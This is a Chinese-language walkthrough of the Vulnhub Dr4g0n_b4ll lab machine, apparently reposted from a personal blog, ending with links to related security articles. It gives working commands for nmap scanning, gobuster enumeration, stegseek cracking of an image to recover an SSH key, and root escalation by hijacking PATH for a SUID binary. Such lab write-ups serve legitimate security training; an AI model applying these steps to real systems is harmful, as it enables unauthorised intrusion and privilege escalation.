【Vulnhub系列】Vulnhub_Dr4g0n_b4ll 靶场渗透(原创)

【Vulnhub系列靶场】Vulnhub_Dr4g0n_b4ll靶场渗透

原文转载已经过授权

原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境搭建

选择打开.ovf 文件

配置名称和路径

打开后调整网络连接模式为【NAT】即可

二、信息收集

1、主机发现

复制代码
nmap.exe -sn 192.168.31.*

2、端口扫描

1、快速粗略的端口扫描

复制代码
nmap.exe -F 192.168.31.65

2、详细端口扫描

复制代码
nmap.exe -sT --min-rate 10000 -p- 192.168.31.65
nmap.exe -sU --min-rate 10000 -p- 192.168.31.65

3、详细扫描和漏洞探测

复制代码
nmap.exe -sV -A -p22,80 192.168.31.65
复制代码
nmap.exe --script=vuln -p22,80 192.168.31.65

只发现了一个robots.txt 的文件

3、web 目录探测

复制代码
gobuster.exe dir -u http://192.168.31.65 -w d:\theperson\dirs\dicc.txt -b 404,403 --no-error

4、web 框架探测

复制代码
whatweb http://192.168.31.65

三、获取shell立足点

1、查看敏感信息

1、主页

2、robots.txt 文件

进行base64解码:

3、源代码


2、DRAGON BALL目录信息

1、secret.txt 文件

保存下来做目录爆破

并无收获

2、Vulnhub 目录

3、Vulnhub/login.html:是一个虚假的登录页面

4、aj.jpg:一张黑客的图片

3、图片信息提取

提取图片隐写信息

复制代码
stegseek aj.jpg /usr/share/wordlists/rockyou.txt

4、获取shell 立足点

此时拿到一个ssh密钥,欠缺用户名,此处的xmen 是用户名

我们直接用密钥进行登录

复制代码
ssh xmen@192.168.31.65 -i id_rsa

成功拿到shell

四、提权至root

1、查看敏感文件

shell 是一个suid权限,发现可以执行环境变量中的ps 命令,那么可以尝试用环境变量劫持来提权

2、提权至root

复制代码
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd ~/script
./script

原文转载已经过授权

更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

相关推荐
用户9623779544815 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机19 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机19 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544820 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star20 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
DianSan_ERP6 天前
电商API接口全链路监控:构建坚不可摧的线上运维防线
大数据·运维·网络·人工智能·git·servlet
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全